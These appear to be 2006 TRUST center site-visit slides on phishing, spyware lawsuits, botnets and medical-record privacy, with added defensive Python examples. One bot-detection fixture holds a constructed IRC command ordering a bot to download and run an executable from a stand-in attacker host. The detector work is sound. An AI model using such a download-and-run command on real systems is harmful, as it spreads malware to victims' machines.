TRUST, Berkeley Site Visit, April 26-28, 2006 Year 1: Research – Education – Outreach Overview John Mitchell and Janos Sztipanovits


Page 1

TRUST, Berkeley Site Visit, April 26-28, 2006

Year 1: Research – Education – Outreach Overview

John Mitchell and Janos Sztipanovits

Page 2

Research Goals

Address pressing issues of the day
– Why are computer systems vulnerable to attack? Will Internet fraud, worms, viruses … be with us forever? Can malicious groups take down critical infrastructures?
– How can we make systems more secure, in ways that are acceptable and desirable to their users?
– What new problems of societal significance can be solved? Medical applications? Managing energy and natural resources?

Deep and lasting scientific progress
– Advance the science of computer security
– Understand its intersection with system design
– Recognize and utilize interdependence with other disciplines

Leverage the scale of the TRUST center effectively
– Collaboration, education, develop career paths

Page 3

Research Organization

Five research projects +
– Web authentication and online identity theft
– Electronic medical records
– Sensor nets and embedded systems
– Trustworthy systems
– Network security and defenses
+ Education (managed through the same process)

Each research project combines
– Faculty and students from several (3-5) sites
– Security, Systems and Software, Social Sciences
– Education and outreach activities

Some activities contribute to several projects

Page 4

TRUST Research Vision

(Diagram, three layers:)

Societal Challenges: Privacy; Computer and Network Security; Critical Infrastructure. TRUST will address social, economic and legal challenges.

Integrative Efforts: Electronic Medical Records; Identity Theft Project; Secure Networked Embedded Systems. Specific systems that represent these social challenges.

Component Technologies: Software Security; Trusted Platforms; Applied Cryptographic Protocols; Network Security; Secure Network Embedded Systems; Forensics and Privacy; Complex Interdependency Modeling; Model-based Security Integration; Economic, Public Policy and Social Challenges; Secure Component Platforms; HCI and Security; Secure Information Management Software Tools. Component technologies that will provide solutions.

Details have changed but the spirit of this vision remains.

Page 5

Problem 1: Online Identity Theft

Password phishing
– Forged email and fake web sites steal passwords
– Passwords used to withdraw money, degrade trust

Password theft
– Criminals break into servers and steal password files

Spyware
– Keyloggers steal passwords, product activation codes, etc.

Botnets
– Networks of compromised end-user machines spread spam, launch attacks, collect and share stolen information

Magnitude
– $$$ Hundreds of millions in direct loss per year
– Significant indirect loss: brand erosion, loss of confidence in online transactions, inconvenience of restoring credit rating and identity
– Challenge for critical infrastructure protection

Page 6

TRUST team

Stanford
– D Boneh, J Mitchell, D Dill, M Rosenblum, Jennifer Granick (Law School)
– A Bortz, N Chou, C Jackson, N Miyake, R Ledesma, B Ross, E Stinson, Y Teraguchi, …

Berkeley
– D Tygar, R Dhamija, …
– Deidre Mulligan (UC Berkeley Law), Erin Jones, Steve Maurer, …

CMU
– A Perrig, D Song
– B Parno, C Kuo

Partners and collaborators
– US Secret Service, DHS/SRI Id Theft Tech Council, RSA Security, …
– R Rodriguez, D Maughan, …

And growing …

Page 7

TRUST ID Theft Team (+ more)

Page 8

Phishing Attack

(Diagram of the attack sequence:)
– Attacker sends email: "There is a problem with your eBuy account"
– User clicks on the email link to www.ebuj.com.
– User thinks it is ebuy.com, enters eBuy username and password.
– Password sent to the bad guy.

Page 9

SpoofGuard browser extension

SpoofGuard is added to the IE tool bar
– User configuration
– Pop-up notification as method of last resort
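The slides give the attack (ebuj.com standing in for ebuy.com) but not the heuristics a toolbar would run on the address bar. The following is an added example in the spirit of a SpoofGuard-type checker, not SpoofGuard's own code: it scores a URL for the classic spoof signals (raw IP host, user-info before the host, a trusted name embedded in an unrelated host, homoglyph substitution, small edit distance from a site the user has an account at). The trusted-domain list, the weights, the threshold and the two-label domain extraction are constructed assumptions; like SpoofGuard's settings they would be user-configurable.

```python
"""Address-bar spoof heuristics (added example; not SpoofGuard's code)."""
import ipaddress
from urllib.parse import urlsplit

# Constructed list of sites the user has accounts at (assumption).
TRUSTED_DOMAINS = {"ebuy.com", "paypal.com", "bankofexample.com"}
ALERT_THRESHOLD = 3  # assumption: total score at which the warning fires


def registrable_domain(host: str) -> str:
    """Last two labels of the host (simplification: no public-suffix list)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def fold_homoglyphs(name: str) -> str:
    """Map characters attackers substitute for look-alikes back to the letters
    a user reads them as (partial, ASCII-only table)."""
    name = name.replace("rn", "m").replace("vv", "w")
    return name.translate(str.maketrans("01358|", "olesbl"))


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def score_url(url: str):
    """Return (score, reasons); a higher score means more likely a spoof."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    score, reasons = 0, []

    if "@" in parts.netloc:
        score += 3
        reasons.append("user-info before the host hides the real destination")
    try:
        ipaddress.ip_address(host)
    except ValueError:
        pass
    else:
        score += 3
        reasons.append("raw IP address instead of a domain name")
        return score, reasons

    domain = registrable_domain(host)
    if domain in TRUSTED_DOMAINS:
        return score, reasons  # the genuine site for this registrable domain

    folded = fold_homoglyphs(domain)
    for trusted in TRUSTED_DOMAINS:
        if folded == trusted:
            score += 3
            reasons.append(f"homoglyph of {trusted}")
        else:
            distance = levenshtein(domain, trusted)
            if distance == 1:
                score += 3
                reasons.append(f"one edit away from {trusted}")
            elif distance == 2:
                score += 2
                reasons.append(f"two edits away from {trusted}")
        # ebuy.com.account-check.example: trusted name used as a subdomain
        if f".{trusted}." in f".{host}.":
            score += 3
            reasons.append(f"{trusted} used as a subdomain of an unrelated host")
    if parts.scheme != "https":
        score += 1
        reasons.append("not HTTPS")
    return score, reasons


def is_suspicious(url: str) -> bool:
    return score_url(url)[0] >= ALERT_THRESHOLD


if __name__ == "__main__":
    for u in ("https://www.ebuy.com/signin", "http://www.ebuj.com/signin",
              "http://www.paypa1.com/", "http://192.0.2.10/ebuy/login"):
        print(u, score_url(u))
```

Heuristics like these produce false positives on legitimate but unusual hosts (a CDN, a partner domain), which is why the slide lists the pop-up as a method of last resort: the score should drive a graded indicator, and only a high score an interruption.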

Page 10

Berkeley: Dynamic Security Skins

Automatically customize secure windows

Visual hashes
– Random Art: visual hash algorithm
– Generate a unique abstract image for each authentication
– Use the image to "skin" windows or web content
– Browser generated or server generated
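A visual hash turns a secret into a picture a person can compare at a glance. The block below is an added example, not the Dynamic Security Skins code: Random Art renders an abstract image from a hash, and here the OpenSSH "drunken bishop" walk is substituted because it fits in a few lines and produces ASCII rather than a bitmap. The property that matters is the same in both: the picture is a deterministic function of a secret (a session key or a user-chosen string) that a spoofed site cannot reproduce, so the skin on a phishing page will not match. The session-key binding in skin_for_session is an assumption about how the secret would be chosen.

```python
"""ASCII visual hash for a security skin (added example; not the DSS code)."""
import hashlib

WIDTH, HEIGHT = 17, 9
SYMBOLS = " .o+=*BOX@%&#/^"  # cell symbol by visit count; the last one saturates


def drunken_bishop(digest: bytes):
    """Walk a bishop over the field; each byte yields four diagonal steps."""
    field = [[0] * WIDTH for _ in range(HEIGHT)]
    x, y = WIDTH // 2, HEIGHT // 2
    for byte in digest:
        for _ in range(4):
            dx = 1 if byte & 0x1 else -1
            dy = 1 if byte & 0x2 else -1
            x = min(max(x + dx, 0), WIDTH - 1)
            y = min(max(y + dy, 0), HEIGHT - 1)
            field[y][x] += 1
            byte >>= 2
    return field, (x, y)


def visual_hash(secret: bytes, label: str = "") -> str:
    """Render the art for `secret`; the same secret always gives the same picture."""
    digest = hashlib.sha256(secret).digest()[:16]
    field, (ex, ey) = drunken_bishop(digest)
    rows = []
    for y in range(HEIGHT):
        row = ""
        for x in range(WIDTH):
            if (x, y) == (WIDTH // 2, HEIGHT // 2):
                row += "S"  # start of the walk
            elif (x, y) == (ex, ey):
                row += "E"  # end of the walk
            else:
                row += SYMBOLS[min(field[y][x], len(SYMBOLS) - 1)]
        rows.append("|" + row + "|")
    top = "+" + label[:WIDTH].center(WIDTH, "-") + "+"
    return "\n".join([top] + rows + ["+" + "-" * WIDTH + "+"])


def skin_for_session(session_key: bytes, site: str) -> str:
    """Server- or browser-generated skin bound to both the session secret and
    the site name, so another site or another session gets a different image
    (assumption about how the secret is chosen)."""
    return visual_hash(site.encode() + b"\0" + session_key, label=site)


if __name__ == "__main__":
    print(skin_for_session(b"shared-session-secret", "ebuy.com"))
    print(skin_for_session(b"shared-session-secret", "ebuj.com"))
```

The usability caveat the page's own studies address: users must actually compare the picture, so the browser-generated variant shows it on the trusted password window, where the browser controls rendering and a page cannot overlay it.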

Page 11

CMU Phoolproof prevention

Eliminates reliance on perfect user behavior

Protects against keyloggers, spyware

Uses a trusted mobile device to perform mutual authentication with the server

Page 12

Tech Transfer

SpoofGuard
– Some SpoofGuard heuristics now used in the eBay toolbar and Earthlink ScamBlocker
– Very effective against basic phishing attacks

PwdHash
– Collaboration with RSA Security to implement PwdHash on one-time RSA SecurID passwords
– RSA SecurID one-time passwords are still vulnerable to online phishing (a phished passcode can be relayed to the real site while it is valid); PwdHash helps strengthen SecurID passwords by making the submitted passcode site-specific

New browser extensions for privacy
– SafeCache and SafeHistory

Client-side architecture for spyware resistance
– SpyBlock: virtualization, browser extension, trusted agent
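PwdHash's idea is that the password the browser submits is derived from the user's master password and the domain the browser is really connected to, so a password captured at ebuj.com is useless at ebuy.com. The block below is an added example of that derivation, not the PwdHash extension's code: it uses HMAC-SHA256 where PwdHash used HMAC-MD5, a two-label domain extraction where PwdHash consulted a suffix list, and a constructed output-shaping step so the result satisfies a typical site's character-class rules.

```python
"""Per-site password derivation in the spirit of PwdHash (added example)."""
import base64
import hashlib
import hmac
from urllib.parse import urlsplit

LOWER = "abcdefghijklmnopqrstuvwxyz"
UPPER = LOWER.upper()
DIGITS = "0123456789"


def site_domain(url: str) -> str:
    """Registrable domain of the URL the browser is at (last two labels;
    a simplification standing in for a public-suffix list)."""
    host = (urlsplit(url).hostname or "").lower()
    return ".".join(host.split(".")[-2:])


def pwdhash(master_password: str, url: str, length: int = 12) -> str:
    """Site-specific password: HMAC keyed by the master password over the domain.
    The same master password yields a different value at every domain, and the
    value at the phishing domain reveals nothing about the value at the real one."""
    if length < 4:
        raise ValueError("length must be at least 4")
    domain = site_domain(url)
    digest = hmac.new(master_password.encode(), domain.encode(), hashlib.sha256).digest()
    # base64 text with the symbols many sites reject swapped for letters
    raw = base64.b64encode(digest).decode().rstrip("=").replace("+", "x").replace("/", "y")
    out = list(raw[: length - 3])
    # Reserve the last three positions for one lower, one upper and one digit,
    # chosen from digest bytes so the result stays deterministic (constructed rule).
    for i, alphabet in enumerate((LOWER, UPPER, DIGITS)):
        out.append(alphabet[digest[-1 - i] % len(alphabet)])
    return "".join(out)


if __name__ == "__main__":
    for url in ("https://www.ebuy.com/login", "https://ebuy.com/account",
                "http://www.ebuj.com/login"):
        print(f"{url:35} -> {pwdhash('hunter2', url)}")
```

The derivation only helps if the domain fed to it is the one the browser actually resolved, not one the user typed or the page claims; that is why PwdHash lives in the browser rather than on the page. Applied to a SecurID passcode, the same step makes a passcode phished at one domain invalid at the real one, which is the strengthening the slide refers to.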

Page 13

Botnets: detect and disable

Botnet: collection of compromised hosts
– Spread like worms and viruses
– Platform for many attacks: spam forwarding, keystroke logging, denial of service attacks

Unique characteristic: "rallying"
– Bots spread like worms and trojans
– Centralized control of the botnet is the characteristic feature

Current efforts
– Spyware project with Stanford Law School
– CMU botnet detection, based on methods that bots use to hide themselves
– Stanford host-based bot detection: taint analysis, comparing network buffer and syscall args
– Botnet and spyware survival
– SpyBlock: virtualization and containment of passwords
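The Stanford item above rests on one observation: a bot acts on commands it received from its controller, so bytes that arrived from the network reappear as arguments to sensitive system calls (the host it is told to contact, the file it is told to run), whereas an ordinary client chooses those arguments itself. Full taint tracking follows the bytes through the program; the added example below does the cheaper content-based check the slide describes, comparing each sensitive call's arguments against recently received buffers. It is not the project's tool; the set of sensitive calls, the window size, the minimum match length and the two traffic samples are constructed.

```python
"""Host-based bot detection: syscall args vs. network input (added example)."""
from collections import deque

# Calls whose arguments should not come straight off the wire (assumption).
SENSITIVE_CALLS = {"connect", "execve", "CreateProcess", "open", "sendto"}
MIN_MATCH_LEN = 4  # ignore tiny arguments ("80", "/") that match by chance (assumption)


class NetworkArgMonitor:
    def __init__(self, window: int = 16):
        self.recent = deque(maxlen=window)  # last N receive buffers of this process
        self.alerts = []

    def on_recv(self, data: bytes) -> None:
        self.recent.append(data)

    def on_syscall(self, name: str, *args) -> bool:
        """Record an alert and return True if a sensitive call takes an
        argument that occurs verbatim in recently received network data."""
        if name not in SENSITIVE_CALLS:
            return False
        for arg in args:
            blob = arg.encode() if isinstance(arg, str) else arg
            if not isinstance(blob, (bytes, bytearray)) or len(blob) < MIN_MATCH_LEN:
                continue
            for buf in self.recent:
                if blob in buf:
                    self.alerts.append((name, blob.decode(errors="replace")))
                    return True
        return False


# Constructed traffic: an IRC-style order from a botnet controller.
BOT_COMMAND = b"PRIVMSG #ctl :.download http://dl.evil.example/upd.exe C:\\Temp\\upd.exe\r\n"
# Constructed benign traffic: an ordinary HTTP response.
WEB_PAGE = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>hello</html>"


def bot_session() -> list:
    """A bot parsing its order and acting on it: two alerts."""
    mon = NetworkArgMonitor()
    mon.on_recv(BOT_COMMAND)
    mon.on_syscall("connect", "dl.evil.example", 80)  # host came from the command
    mon.on_syscall("execve", "C:\\Temp\\upd.exe")     # path came from the command
    return mon.alerts


def browser_session() -> list:
    """A client that picks its own paths and hosts: no alert."""
    mon = NetworkArgMonitor()
    mon.on_recv(WEB_PAGE)
    mon.on_syscall("open", "/home/user/.cache/page-0001.html")
    mon.on_syscall("connect", "www.news.example", 443)  # from the user's bookmark
    return mon.alerts


if __name__ == "__main__":
    print("bot:", bot_session())
    print("browser:", browser_session())
```

Two caveats a practitioner will hit. Legitimate programs sometimes do open files named by the server (a download manager), so a single match is a signal, not a verdict; the Stanford work tracks taint through the program and looks at the pattern of calls over time. And a bot that decodes or decrypts its commands defeats the substring check, which true taint propagation survives because taint follows the decoded bytes.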

Page 14

Research Spotlight

Stanford Cyberlaw Clinic: Spyware Litigation Project

Lisa Schwartz, Henry Huang, Jennifer Granick

Law and CS faculty, law students, many CS grad and undergrad students

Page 15

Cyberlaw Clinic: PacerD

Backdoor Trojan spyware
– distributed via misleading pop-up
– installed even if the user clicked the pop-up's "close" button

Users' computers transformed into "marketing machines"
– Up to 7 pop-ups/minute, …

Who is behind PacerD?
– Seychelles P.O. box, Seattle voice mail number, Russian ISPs

Spyware bundle will install unless the user takes complex or difficult action

Oct. '05
– CS team sets up testing environment

Nov. '05
– CS team creates videos depicting PacerD installation, …, removal
– Rootkits detected inside PacerD

Dec. '05 – Feb. '06
– Cyberlaw Clinic drafts lawsuit

March – April '06
– Over 300 PacerD victims contacted
– Litigation plan being developed

"Pyramid of Deception" (diagram): CPM Media, KVM Media, PacerD, Exfol

Page 16

Cyberlaw Clinic: Enternet

Enternet Media (EM): Internet ad firm in CA

EliteBar a.k.a. Elite Toolbar
– distributed through websites
– no notice of installation
– prevents uninstallation
– collects personal information

EULA: unconscionable terms

Enternet hides the EULA and uninstaller; the uninstaller purposely fails to remove EliteBar

Gov't Suits Against Enternet

FTC filed against Enternet 11/4/05
– injunction froze assets
– stopped distribution of EliteBar

City of L.A. also sued Enternet
– alleging unfair competition, deception

Criminal charges in LA, March 2006
– incl. false advertising, consumer fraud

Page 17

ID Theft: Future challenges

Criminals become increasingly sophisticated
– "In 25 years of law enforcement, this is the closest thing I've seen to the perfect crime" – Don Wilborn

Increasing interest at the server side
– Losses are significant

Need improved platform security
– Protect assets from crimeware

Need improved web authentication
– Basic science can be applied to solve the problem: challenge-response, two-factor auth, …

Social awareness, legal issues, and human factors
– Studies with Law Clinics; user studies: how are users fooled?

Technology transfer
– More free software, RSA Security, …

Multi-campus project developing technology, evaluation, social impact. Project meetings this spring. Public workshop at Stanford in June.
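Both the Phoolproof slide (a trusted mobile device performing mutual authentication with the server) and the "challenge-response, two-factor auth" item above describe the same building block, so one added example serves both. It is not Phoolproof's code: Phoolproof keeps a per-site key pair on the phone and checks the server's TLS certificate, while this toy uses a per-site symmetric key enrolled on the device and HMAC proofs in both directions. Each MAC also covers a channel value standing in for the TLS session, so a phisher who relays messages between the device and the real site ends up with proofs computed over the wrong channel. Site names, keys and channel labels are constructed.

```python
"""Mutual, channel-bound challenge-response with a trusted device (added example)."""
import hashlib
import hmac
import secrets


def _mac(key: bytes, *parts: bytes) -> bytes:
    h = hmac.new(key, digestmod=hashlib.sha256)
    for p in parts:  # length-prefix each field so the concatenation is unambiguous
        h.update(len(p).to_bytes(2, "big") + p)
    return h.digest()


class Site:
    """Server side; holds the enrolled key (one user, for brevity)."""
    def __init__(self, name: str, key: bytes):
        self.name, self.key = name, key

    def challenge(self, device_nonce: bytes, channel: bytes):
        """Server proves itself first, before the device reveals anything."""
        self.nonce = secrets.token_bytes(16)
        proof = _mac(self.key, b"server", self.name.encode(), self.nonce, device_nonce, channel)
        return self.nonce, proof

    def verify(self, device_nonce: bytes, channel: bytes, response: bytes) -> bool:
        expected = _mac(self.key, b"device", self.name.encode(), self.nonce, device_nonce, channel)
        return hmac.compare_digest(expected, response)


class TrustedDevice:
    """The phone: one key per enrolled site, never shown to the PC or the user."""
    def __init__(self):
        self.keys = {}

    def enroll(self, site_name: str, key: bytes) -> None:
        self.keys[site_name] = key

    def begin(self) -> bytes:
        self.nonce = secrets.token_bytes(16)
        return self.nonce

    def respond(self, site_name: str, server_nonce: bytes, channel: bytes, proof: bytes):
        key = self.keys.get(site_name)
        if key is None:
            return None  # not enrolled for this site: nothing to type, nothing to steal
        expected = _mac(key, b"server", site_name.encode(), server_nonce, self.nonce, channel)
        if not hmac.compare_digest(expected, proof):
            return None  # the other end could not prove it holds the key: refuse
        return _mac(key, b"device", site_name.encode(), server_nonce, self.nonce, channel)


def login(device: TrustedDevice, site: Site, browser_site: str,
          device_channel: bytes, site_channel: bytes) -> bool:
    """browser_site is the name the browser reports; the channel values are
    what each end sees of the transport (the same bytes when there is no relay)."""
    dn = device.begin()
    sn, proof = site.challenge(dn, site_channel)
    resp = device.respond(browser_site, sn, device_channel, proof)
    return resp is not None and site.verify(dn, site_channel, resp)


KEY = secrets.token_bytes(32)
REAL = Site("ebuy.com", KEY)
PHONE = TrustedDevice()
PHONE.enroll("ebuy.com", KEY)


def direct_login() -> bool:
    ch = b"tls-session-1"  # both ends see the same channel
    return login(PHONE, REAL, "ebuy.com", ch, ch)


def phishing_site_login() -> bool:
    fake = Site("ebuj.com", secrets.token_bytes(32))  # attacker lacks the ebuy.com key
    return login(PHONE, fake, "ebuj.com", b"tls-x", b"tls-x")


def relay_attack_login() -> bool:
    # Phisher in the middle forwards nonces and MACs verbatim, but the device's
    # channel to the phisher differs from the phisher's channel to the real site.
    return login(PHONE, REAL, "ebuy.com", b"tls-to-phisher", b"tls-to-real-site")
```

Nothing the user types is a secret here, so a keylogger on the PC captures only nonces and MACs that are useless after this session, which is the "protects against keyloggers, spyware" claim on the Phoolproof slide. The device's refusal to answer for an unenrolled or unproven site is what removes the reliance on the user spotting ebuj.com.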

Page 18

Problem 2: Healthcare Information

Rise in mature population
– Population of age 65 and older with Medicare was 35 million for 2003 and 35.4 million for 2004 (table compiled by the U.S. Administration on Aging based on data from the U.S. Census Bureau)

New types of technology
– Electronic Patient Records
– Telemedicine
– Remote Patient Monitoring

Empower patients
– Access to own medical records
– Control the information
– Monitor access to medical data

Regulatory compliance

(Chart: percentage of population over 60 years old in 2050, global average = 21%. Source: United Nations, "Population Aging 2002".)

Page 19

Privacy and regulatory issues

Health Insurance Portability and Accountability Act of 1996 (HIPAA)
– HIPAA Privacy Rule (2003) gives US citizens the right to access their medical records and the right to request amendments, an accounting of disclosures, etc.
– HIPAA Security Rule (2005) requires healthcare organizations to protect person-identifiable health data that is in electronic format

Complexity of privacy
– Variable levels of sensitivity; "sensitive" is in the eye of multiple beholders
– No bright line between person-identifiable and "anonymous" data

Complexity of access rights and policies
– Simple role-based access control is insufficient
– Governing principles: "need-to-know" and "minimum disclosure"
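The last two bullets are the crux: a role alone says nothing about whether this clinician treats this patient or needs this part of the record. The added example below is a small policy evaluator, not the project's policy language, that layers a treating relationship (need-to-know), purpose of use, and section-level release (minimum disclosure) on top of roles, and writes the accounting-of-disclosure entry the Privacy Rule lets patients request. Roles, record sections and rules are constructed for illustration; the one rule taken from HIPAA is that psychotherapy notes are excluded from the patient's own right of access.

```python
"""EMR access policy beyond RBAC: need-to-know and minimum disclosure (added example)."""
from dataclasses import dataclass, field

SECTIONS = {"demographics", "medications", "labs", "psychotherapy_notes", "billing_codes"}


@dataclass
class Subject:
    user_id: str
    role: str                  # "physician", "psychiatrist", "nurse", "billing", "patient"
    purpose: str               # "treatment", "payment", "self"
    care_team_for: set = field(default_factory=set)  # patients this user actually treats


# (role, purpose, treating relationship required?, sections released)  -- constructed
RULES = [
    ("physician",    "treatment", True,  {"demographics", "medications", "labs"}),
    ("psychiatrist", "treatment", True,  {"demographics", "medications", "labs", "psychotherapy_notes"}),
    ("nurse",        "treatment", True,  {"demographics", "medications", "labs"}),
    ("billing",      "payment",   False, {"demographics", "billing_codes"}),
    ("patient",      "self",      False, SECTIONS - {"psychotherapy_notes"}),
]

DISCLOSURE_LOG = []  # (user_id, patient_id, purpose, sections): accounting of disclosures


def authorize(subject: Subject, patient_id: str, requested: set) -> dict:
    """Return {'granted': set of sections, 'denied': {section: reason}}."""
    denied = {s: "no rule grants this section to this role and purpose" for s in requested}
    granted = set()
    for role, purpose, needs_relationship, sections in RULES:
        if role != subject.role or purpose != subject.purpose:
            continue
        if role == "patient" and subject.user_id != patient_id:
            denied = {s: "patients may read only their own record" for s in requested}
            break
        if needs_relationship and patient_id not in subject.care_team_for:
            # RBAC alone would grant here; need-to-know says no.
            denied = {s: "need-to-know: not on this patient's care team" for s in requested}
            break
        granted = requested & sections  # minimum disclosure: only what the purpose needs
        denied = {s: "outside the sections this purpose needs" for s in requested - sections}
        break
    if granted:
        DISCLOSURE_LOG.append((subject.user_id, patient_id, subject.purpose, frozenset(granted)))
    return {"granted": granted, "denied": denied}


if __name__ == "__main__":
    nurse = Subject("n1", "nurse", "treatment", {"p-100"})
    print(authorize(nurse, "p-100", {"labs", "psychotherapy_notes"}))
    print(authorize(Subject("d9", "physician", "treatment", {"p-200"}), "p-100", {"labs"}))
    print(DISCLOSURE_LOG)
```

The deliberately missing piece is emergency ("break-glass") access, which real EMR policy must allow and then audit; in this model it would be a further rule that grants treatment sections without the relationship check but logs the override for review.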

Page 20

Healthcare Information Access Roles

(Diagram, from Dan Masys, "The nature of biomedical data". Four groups: Patient, Provider, Payer, Society. Roles shown: primary care, specialists, ancillaries, immediate family, extended family, community support, friends, legally authorized reps, admin staff, claims processors, subcontractors, clearinghouses, insurers, public health, state licensure boards, law enforcement, internal QA, external accreditation orgs, clinical trial sponsors, fraud detection, Medical Information Bureau, business consultants, national security, bioterrorism detection.)

Page 21

TRUST and MyHealth Teams (Faculty)

Vanderbilt
– J Sztipanovits, G Karsai, A Ledeczi

Stanford
– J Mitchell, H Garcia-Molina, R Motwani

Berkeley
– R Bajcsy, S Sastry, M Eklund
– Deidre Mulligan (UC Berkeley Law)

CMU
– M Reiter, D Song

Cornell
– J Gehrke, S Wicker, F Schneider

VU Medical Center Collaborators
– D Masys, M Frisse, D Giuse, J Jirjis, M Johnson, N Lorenzi, D Mays, …

Page 23

Patient Portal Project

Vanderbilt MyHealth Patient Portal
– Enrolled 8,000 patients, growing at a rate of over 1,000 new enrollees per month
– Secure messaging, access to medical records, appointments

Include real-time monitoring of congestive heart failure patients
– Heterogeneous sensor network for monitoring
– Data integrated into MyHealth@Vanderbilt

Berkeley ITALH Testbed: seniors in Sonoma
– Stationary sensors: motion detectors, camera systems
– Wearable sensors: fall sensors, heart rate or pulse monitors

Page 24: TRUST, Berkeley Site Visit, April 26-28, 2006 Year 1: Research – Education – Outreach Overview John Mitchell and Janos Sztipanovits

Year 1 Research Overview 24TRUST, Berkeley Site Visit, April 26-28, 2006

Technical Challenges (1/2)

Access Control, unique problems:
– Policy languages
– Policy validation
– Distributed policy enforcement

Data Privacy, unique problems:
– Learning from data while keeping individual data private
– Publishing data without the possibility of linking back to individuals
– Information flow through data access: "leaking secret data"
– Incorporating background knowledge
– Interaction between privacy and policy languages
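"Publishing data without the possibility of linking back to individuals" and "incorporating background knowledge" are two sides of one problem: a release with names removed is still person-identifiable when an outsider knows a few attributes of the person. The added example below (constructed rows, not real patient data) runs the linkage attack against such a release, measures k-anonymity and a homogeneity check on the result, and shows the simplest generalization (zip prefix, birth decade) that raises k above 1. It is illustrative code, not the project's privacy mechanism.

```python
"""Linkage attack and k-anonymity check on a de-identified release (added example)."""
from collections import defaultdict

QUASI = ("zip", "birth_year", "sex")  # quasi-identifiers an outsider can plausibly know

# Constructed release: direct identifiers stripped, but every row is still unique.
RELEASE = [
    {"zip": "94704", "birth_year": 1951, "sex": "F", "diagnosis": "heart failure"},
    {"zip": "94704", "birth_year": 1958, "sex": "F", "diagnosis": "diabetes"},
    {"zip": "94705", "birth_year": 1952, "sex": "M", "diagnosis": "asthma"},
    {"zip": "94705", "birth_year": 1959, "sex": "M", "diagnosis": "heart failure"},
    {"zip": "94707", "birth_year": 1944, "sex": "F", "diagnosis": "osteoporosis"},
    {"zip": "94707", "birth_year": 1947, "sex": "F", "diagnosis": "depression"},
    {"zip": "94709", "birth_year": 1961, "sex": "M", "diagnosis": "asthma"},
    {"zip": "94709", "birth_year": 1964, "sex": "M", "diagnosis": "diabetes"},
]


def equivalence_classes(rows, quasi=QUASI):
    """Group rows that are indistinguishable on the quasi-identifiers."""
    classes = defaultdict(list)
    for r in rows:
        classes[tuple(r[q] for q in quasi)].append(r)
    return classes


def k_anonymity(rows, quasi=QUASI) -> int:
    """Smallest class size: each person hides among at least k rows."""
    return min(len(c) for c in equivalence_classes(rows, quasi).values())


def l_diversity(rows, sensitive="diagnosis", quasi=QUASI) -> int:
    """Smallest number of distinct sensitive values in any class; a class whose
    rows all share a diagnosis leaks it even when k is large."""
    return min(len({r[sensitive] for r in c}) for c in equivalence_classes(rows, quasi).values())


def linkage_attack(rows, background: dict, sensitive="diagnosis") -> set:
    """What an attacker who knows someone's quasi-identifiers learns."""
    matches = [r for r in rows if all(r[q] == v for q, v in background.items())]
    return {r[sensitive] for r in matches}


def generalize(rows, zip_digits=3, year_bucket=10):
    """Coarsen zip to a prefix and birth year to a bucket; other fields unchanged."""
    out = []
    for r in rows:
        g = dict(r)
        g["zip"] = r["zip"][:zip_digits] + "*" * (len(r["zip"]) - zip_digits)
        g["birth_year"] = f"{r['birth_year'] // year_bucket * year_bucket}s"
        out.append(g)
    return out


if __name__ == "__main__":
    neighbour = {"zip": "94704", "birth_year": 1951, "sex": "F"}  # constructed background knowledge
    print("raw k =", k_anonymity(RELEASE), "attack learns", linkage_attack(RELEASE, neighbour))
    coarse = generalize(RELEASE)
    coarse_bg = {q: generalize([neighbour])[0][q] for q in QUASI}
    print("coarse k =", k_anonymity(coarse), "l =", l_diversity(coarse),
          "attack learns", linkage_attack(coarse, coarse_bg))
```

Generalization trades utility for privacy, and k-anonymity says nothing about what the attacker already knows beyond the quasi-identifiers (if the neighbour is known to be diabetic the class of two collapses to one), which is the "background knowledge" item on the slide and the reason later work moved to differential privacy for the "learning from data" case.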

Page 25

Technical Challenges (2/2)

Distributed trust management, unique problems:
– Maintaining trust across multiple players with conflicting interests and policies

Information architecture modeling and analysis, unique problems:
– Technical and organizational heterogeneity
– Major role of legacy systems
– Scale and complexity

Benchmarking
– Creation of synthetic patient data
– Real-life patient data

Societal Impact of Patient Portals
– What privacy policy would make patients comfortable with contributing data to a research study?

Page 26

Approaches

What solutions are possible? Some examples:
– Policy languages (Stanford)
– Data privacy (Cornell, Stanford)
– Information architecture modeling and analysis (VU, Berkeley)
– Distributed trust management (Cornell, Stanford)
– Societal impact (Berkeley)

Use MyHealth (VU) as demo system
– Put TRUST research thrusts in MyHealth contexts

Page 27

Initial Steps

Discussions with VU Medical Center in September, 2005
– Prof. Bill Stead, Director, Informatics Center
– Prof. Dan Masys, Chair, Department of Biomedical Informatics

Design Workshop for Integrative Project on Patient Portals
– December 16, 2005 at Vanderbilt Center for Better Health (http://dbmi.mc.vanderbilt.edu/trust/#Output)
– Identified two project candidates and a joint White Paper topic

Detailed project planning between TRUST and VU MyHealth
– We have a joint memo of collaboration management structure and research agenda for the next year

Workshop on Trust and Privacy in Electronic Medical Records
– April 28th at Berkeley

Page 28

Meeting at Vanderbilt

Page 29

Milestones (Year 1)

Policy languages
– HIPAA policy representation and validation

Data Privacy
– Assemble sample medical database for evaluating privacy mechanisms, other mechanisms

Information architecture modeling and analysis
– Modeling aspects and language specifications
– MyHealth architecture modeling and analysis methods

Distributed trust management

Societal impact
– Organizational impacts, changes in the decision processes
– Unintended consequences study

Page 30

Research Spotlight

Berkeley ITALH Testbed: Electronic Medical Record Project

Tanya Roosta, Marci Meingast, Edgar Lobotan, Ruzena Bajcsy, Shankar Sastry, Mike Eklund, Adeeti Ullal, Rustom Dessai, Willy Cheung, Albert Chang

EECS Faculty, Grad, Undergrad, and SUPERB students

Page 31

Berkeley ITALH Testbed

Biomedical sensor systems
– Can monitor for acute and chronic conditions and emergency events
– Can be kept locally or transmitted to a healthcare professional and EMRs

Storage in medical record
– Potentially very useful
– Currently ad hoc and manually performed

Oct '05 – Mar '06
– Development and testing of fall sensor system, joint with Tampere, Finland and Aarhus, Denmark

Mar – Apr '06
– Commitment from Telecom Italia
– Evaluation of EMR system for integration in Sonoma

Apr – May '06
– Preparation of lab for experimentation and EMR integration

Jun – Jul '06
– SUPERB program focus

